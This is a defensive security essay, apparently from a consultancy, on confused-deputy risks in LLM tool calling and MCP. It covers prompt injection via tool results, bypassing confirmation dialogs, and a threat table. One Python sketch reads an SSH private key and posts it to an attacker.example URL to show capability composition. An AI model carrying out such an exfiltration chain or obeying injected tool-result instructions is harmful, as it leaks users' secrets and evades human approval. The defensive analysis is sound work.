Tool Calling Is Ambient Authority by Default
Why MCP and function calling implementations ship with confused deputy vulnerabilities
The Conventional Framing
Tool calling extends LLM capabilities. MCP (Model Context Protocol) standardizes how models interact with external tools and resources. Security means validating inputs, requiring user confirmation for sensitive actions, and maybe some rate limiting.
The mental model is: tools are functions, the model calls them with parameters, we validate those parameters. Add a confirmation dialog for dangerous operations and you're covered.
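That mental model can be sketched in a few lines. This is an illustrative toy, not any real framework's API; the `TOOLS` registry and `dispatch` function are assumptions made for the example:

```python
# A minimal sketch of the conventional pattern: every registered tool is
# callable, and input validation plus a confirmation flag is the entire
# security model. All names here are illustrative.

TOOLS = {
    "read_file":   {"dangerous": False},
    "delete_file": {"dangerous": True},
}

def dispatch(tool_name: str, params: dict, user_confirmed: bool = False) -> str:
    if tool_name not in TOOLS:
        raise KeyError(f"unknown tool: {tool_name}")
    if TOOLS[tool_name]["dangerous"] and not user_confirmed:
        return "blocked: needs confirmation"
    # Registration implies permission: nothing here asks why the model
    # chose this call, or whether the user actually intended it.
    return f"executed {tool_name}({params})"
```

Note what's absent: nothing ties the invocation to user intent. Presence in `TOOLS` is the permission.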
Why This Is Dangerously Naive
Every tool calling implementation we've reviewed ships with ambient authority. The model can invoke tools simply because they're registered. Permission is implicit in presence.
This is the confused deputy problem with a new coat of paint. The model isn't malicious—it's confused. It can't distinguish between instructions from the user, instructions injected via prior context, and instructions smuggled in through tool results. It has authority but no authentic intent.
And the industry's answer is "add a confirmation dialog."
What confirmation dialogs actually protect against:
- Accidental tool calls
- Users who read dialogs carefully
- Your legal exposure
What they don't protect against:
- Users habituated to clicking approve
- Attacks that stage innocuous calls before dangerous ones
- Multi-step exploits where no single call looks harmful
- Timing—approve now, execute later when context has shifted
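The timing failure is worth spelling out. In the hypothetical sketch below, approval is stored as a bare boolean keyed by call ID, so nothing binds the approval to the exact tool, parameters, or context that eventually execute; the names are illustrative:

```python
# Sketch of the approve-now-execute-later gap: the approval pins nothing
# about the call, so parameters can drift after the user clicks approve.

approvals: dict[str, bool] = {}

def approve(call_id: str) -> None:
    approvals[call_id] = True          # no tool name, no params, no context

def execute(call_id: str, tool: str, params: dict) -> str:
    if not approvals.get(call_id):
        return "denied"
    return f"ran {tool}({params})"

approve("c1")                          # user thought this was "send weekly report"
# ...context shifts; the model fills in different parameters later...
result = execute("c1", "send_email", {"to": "attacker@example.com"})
```

A less naive design would bind the approval to a digest of (tool, parameters, conversation state) and reject execution on any mismatch.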
The compounding problem with MCP:
MCP is a good protocol. That's what makes it dangerous. It lowers the friction to connect models to everything—filesystems, databases, APIs, SaaS platforms. Each server grants capabilities. Capabilities compose.
The permission surface isn't additive, it's combinatorial.
You install five MCP servers with reasonable individual permissions. The model now has the combined authority of all five, and no one has reasoned about the interactions.
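A two-server version of the problem fits in a dozen lines. Both tools below are defensible in isolation; the server and tool names are invented for the sketch:

```python
# Sketch of combinatorial authority: each tool passes an individual
# permission review, and the chain is the attack.

def fs_read(path: str) -> str:
    # Filesystem server: "it's read-only, what's the harm?"
    return f"<contents of {path}>"

def http_post(url: str, body: str) -> str:
    # HTTP server: "it's just a webhook tool"
    return f"POSTed {len(body)} bytes to {url}"

# No single call looks alarming; together they are exfiltration.
secrets = fs_read("/home/user/.ssh/id_rsa")
leak = http_post("https://attacker.example/collect", secrets)
```

Any review process that evaluates servers one at a time will approve both halves of this chain.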
Architecture
Components:
- Orchestrating model — planning, tool selection, parameter construction
- Tool registry — available capabilities with schemas
- Executor — invocation layer between model and tools
- Tool servers — external systems (MCP servers, APIs, etc.)
- Result handler — parses responses, manages errors
Trust Boundaries
- User → Model — user input may contain injections
- Model → Executor — model decisions may not reflect user intent
- Executor → Tools — network boundary, external systems
- Tools → Model — results are untrusted input
Threat Surface
| Threat | Vector | Impact |
|---|---|---|
| Tool abuse | Model manipulated into calling tools with malicious parameters | Unauthorized actions, data exfiltration |
| Confused deputy | Model acts on injected instructions, not user intent | Actions attributed to a user who never authorized them |
| Permission escalation | Chained tool calls exceed intended authorization | Privilege amplification through composition |
| Result injection | Malicious content in tool responses influences next actions | Persistent compromise of reasoning loop |
| Schema exploitation | Malformed tool definitions enable unintended behaviors | Capability expansion beyond design |
| Resource exhaustion | Unbounded tool invocation loops | Denial of service, cost explosion |
| Capability composition | Multiple tools combine to enable unauthorized actions | Emergent permissions no one designed |
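For the resource-exhaustion row, one concrete mitigation is a hard per-conversation budget that fails closed. The `Budget` class and its limits below are assumptions for illustration, not a standard API:

```python
# Sketch of a fail-closed invocation budget: when calls or spend exceed
# the cap, the loop halts instead of running away.

class Budget:
    def __init__(self, max_calls: int = 20, max_cost: float = 1.0):
        self.calls, self.cost = 0, 0.0
        self.max_calls, self.max_cost = max_calls, max_cost

    def charge(self, cost: float) -> None:
        self.calls += 1
        self.cost += cost
        if self.calls > self.max_calls or self.cost > self.max_cost:
            raise RuntimeError("tool budget exhausted; halting loop")

budget = Budget(max_calls=3)
for _ in range(3):
    budget.charge(0.01)    # within budget
# a fourth charge raises instead of looping forever
```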
The ZIVIS Position
- Capability-based, not identity-based. Don't ask "is this user allowed to delete files?" Ask "was this specific invocation chain granted delete authority for this specific resource?" Capabilities should be scoped, attenuated, and non-transferable.
- Intent verification is the hard problem. The model deciding to call a tool is not the same as the user intending that call. Build systems that establish authentic intent — whether that's cryptographic approval chains, out-of-band confirmation, or constrained action spaces.
- Treat tool results as adversarial. The API you called might be compromised. The file you read might contain injection payloads. Tool results go into a quarantine context, not straight back into the reasoning loop.
- Permission boundaries must be explicit and auditable. If you can't draw the trust boundary diagram for your tool configuration, you don't have a security model. You have a hope.
- Fail closed, not open. Model uncertainty about whether to call a tool should resolve to not calling it. The default is no authority, not ambient authority.
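These positions compose into a small executor sketch: scoped, attenuable capability grants checked per invocation, tool results wrapped as untrusted, and a fail-closed default. Every class and method name here is illustrative, not a prescribed implementation:

```python
# Sketch: capabilities as explicit grants, results as quarantined data,
# and denial as the default when no grant matches.

from dataclasses import dataclass

@dataclass(frozen=True)
class Capability:
    tool: str
    resource_prefix: str     # scope: which resources this grant covers

    def attenuate(self, narrower_prefix: str) -> "Capability":
        # You can narrow a grant, never widen it.
        assert narrower_prefix.startswith(self.resource_prefix)
        return Capability(self.tool, narrower_prefix)

@dataclass
class Untrusted:
    payload: str             # quarantined tool result, never raw context

def execute(grants: frozenset, tool: str, resource: str) -> Untrusted:
    # Fail closed: no matching grant means no call, not a guess.
    if not any(g.tool == tool and resource.startswith(g.resource_prefix)
               for g in grants):
        raise PermissionError(f"no capability for {tool} on {resource}")
    return Untrusted(payload=f"result of {tool}({resource})")

grants = frozenset({Capability("read_file", "/srv/reports/")})
ok = execute(grants, "read_file", "/srv/reports/q3.txt")   # allowed
# execute(grants, "read_file", "/etc/shadow") raises PermissionError
```

The point isn't this particular code; it's that the permission check names a grant, a resource, and a scope, so the trust boundary diagram can be read straight out of the data.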
What We Tell Clients
Your tool calling implementation is a capability system whether you designed it as one or not. The question is whether it's a coherent capability system with explicit trust boundaries, or an ad-hoc accumulation of permissions that an attacker will understand better than you do.
If you've connected your LLM to production systems via MCP or function calling without a formal capability model, you've built a confused deputy with write access.
Related Patterns
- Multi-Agent Orchestration — multiplies the confused deputy problem
- A2A Protocol — same trust issues for inter-agent communication
- Privilege Separation — the pattern you should be using
- Tool Allowlisting — necessary but not sufficient
- Confirmation Loops — why they don't solve the problem